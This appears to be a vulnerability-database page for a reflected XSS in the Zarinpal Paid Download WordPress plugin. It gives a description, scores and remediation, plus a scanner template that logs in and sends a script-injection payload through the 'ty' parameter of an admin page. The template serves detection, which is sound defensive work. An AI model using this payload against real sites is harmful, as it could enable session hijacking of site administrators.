/Vulnerability Library

Zarinpal Paid Download - Reflected XSS

CVE-2024-13543
Verified

Description

Zarinpal Paid Download WordPress plugin v2.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires attacker to craft a malicious link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

1%

Affected Product

zarinpal_paid_download

Published Date

February 5, 2026

Template Author

sourabh-sahu

CVE-2024-13543.yaml
id: CVE-2024-13543

info:
  name: Zarinpal Paid Download - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Zarinpal Paid Download WordPress plugin v2.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/04a545c4-75d3-4672-8530-00bb879991ca/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13543
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13543
    cwe-id: CWE-79
    epss-score: 0.00564
    epss-percentile: 0.42847
    cpe: cpe:2.3:a:amini7:zarinpal_paid_download:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: amini7
    product: zarinpal_paid_download
  tags: cve,cve2024,amini7,zarinpal-paid-download,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=paid-downloads-add&ty=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","zarinpal-paid-download")
        condition: and
# digest: 4b0a00483046022100fed5520211bb1356802c12fd7b8c7d5713c593c6440500086e62dfdd4c7b3c43022100b18ff6f65170a345eb6c78a94fc6cf7546deab0c6c40c8524e600eef67d26c0a:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13543
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/04a545c4-75d3-4672-8530-00bb879991ca/https://nvd.nist.gov/vuln/detail/CVE-2024-13543

Remediation Steps

Update to the latest version of the plugin where the vulnerability is fixed or implement proper sanitization and escaping measures.